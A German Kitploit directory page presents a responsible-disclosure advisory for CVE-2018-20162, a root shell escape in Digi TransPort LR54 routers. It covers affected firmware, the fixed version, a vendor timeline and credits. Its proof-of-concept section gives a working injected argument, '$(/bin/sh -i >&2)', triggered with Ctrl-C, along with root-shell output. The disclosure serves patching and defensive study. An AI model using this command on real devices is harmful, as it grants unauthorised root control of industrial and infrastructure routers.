Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/stigtsp/cve-2018-20162-digi-lr54-restricted-shell-escape
Embedded-System-SicherheitPrivilege EscalationIoT-SicherheitSchwachstellenanalyseExploitationPenetrationstestsHardware- & IoT-SicherheitRed Teaming

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
GitHub
stigtsp/cve-2018-20162-digi-lr54-restricted-shell-escape

CVE-2018-20162-digi-lr54-restricted-shell-escape

Proof-of-concept-Exploit für CVE-2018-20162: Sandbox-Escape in Digi TransPort LR54 LTE-Router durch SIGINT-Handling-Fehler, der Root-Shell-Zugriff gewährt.

Repository anzeigen
24vor 7 JahrenNoch nicht geprüft

layout: post title: "CVE-2018-20162: Digi TransPort LR54 - Ausbruch aus der eingeschränkten Shell" author: sgo category: security

Der Digi TransPort LR54 ist ein Hochgeschwindigkeits-LTE-Router, der häufig in Industrie, Infrastruktur, Einzelhandel und öffentlichem Nahverkehr eingesetzt wird.

Er unterstützt die Ausführung von Python-Skripten in einer eingeschränkten Sandbox und verfügt über eine benutzerdefinierte Shell, die über SSH zugänglich ist und denselben Einschränkungen unterliegt. Das zugrunde liegende Betriebssystem ist daher für den Administrator nicht zugänglich.

Ich habe einen Weg gefunden, die Sandbox zu verlassen und eine Root-Shell zu erhalten, indem ich die Art und Weise ausnutze, wie die CLI Befehlszeilenargumente beim Ausführen von Python-Skripten verarbeitet:

Wenn ein interaktiver Python-Prozess ein SIGINT (durch STRG-C) empfängt, werden die Argumente an das Skript nicht ordnungsgemäß maskiert, wenn sie an den Fehlerprotokoll-Handler der interaktiven CLI übergeben werden. Dies ermöglicht es einem Angreifer, beliebige Befehle als Root auszuführen.

Um diese Sicherheitslücke auszunutzen, benötigt ein Angreifer interaktiven CLI-Zugriff mit 'Super'-Berechtigungen. Ein Benutzer mit dieser Zugriffsstufe ist standardmäßig auf dem Gerät aktiviert.

Anfällig

Digi Transport LR54 (und möglicherweise verwandte Produkte wie WR64 und WR54)

Firmware-Version : 4.4.0.26 10/29/2018 21:14:06 Firmware-Version : 4.3.2.24 09/06/2018 00:58:34

Und möglicherweise frühere Versionen

Minderung

Benutzer sollten auf Firmware-Version 4.5.1.4 oder neuer aktualisieren. Auf dem Gerät gespeicherte Geheimnisse wie private Schlüssel und Passphrasen sollten vorsorglich geändert werden.

Proof of Concept

  1. Laden Sie sleep.py per scp oder sftp auf den LR54 hoch, mit folgendem Inhalt:
root@kitploit:~
import time;time.sleep(10)
  1. Führen Sie den folgenden Befehl in der LR54-CLI aus:
root@kitploit:~
python sleep.py --XXX $(/bin/sh -i >&2)
  1. Drücken Sie sofort nach Programmstart STRG-C

  2. Sie landen dann in einer interaktiven Root-Shell:

root@kitploit:~
/home/digi/user # uname -a
Linux (none) 3.10.14 #1 SMP Mon Oct 29 16:18:10 CDT 2018 mips GNU/Linux
/home/digi/user # id
uid=0(root) gid=2000(users_rw) groups=2000(users_rw),2002(users_super)

Zeitplan

  • 2018-12-13: Sicherheitslücke entdeckt
  • 2018-12-14: PoC erstellt, Hersteller benachrichtigt
  • 2018-12-14: Hersteller bestätigt, 60-tägige Embargofrist. CVE beantragt.
  • 2018-12-15: CVE-2018-20162 zugewiesen
  • 2018-12-31: Vorab-Firmware erhalten. Bestätigt, dass nicht anfällig.
  • 2019-01-02: Hersteller veröffentlicht behobene Firmware 4.5.1.4
  • 2019-01-25: Hersteller aktualisiert Versionshinweise mit Verweis auf CVE-2018-20162
  • 2019-02-13: Hersteller stimmt Offenlegung zu, Embargo aufgehoben

Referenzen

  • https://www.digi.com/products/networking/cellular-routers/digi-transport-lr54
  • http://ftp1.digi.com/support/firmware/transport/LR54/v4.5.1.4/93001306_L.pdf
  • https://www.digi.com/resources/security
  • https://blog.hackeriet.no/cve-2018-20162-digi-lr54-restricted-shell-escape
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20162

Danksagungen

Sicherheitslücke entdeckt von Stig Palmquist.

Dank an @duniel_pls und @alexanderkjall für die Überprüfung dieses Berichts.

Tool herunterladen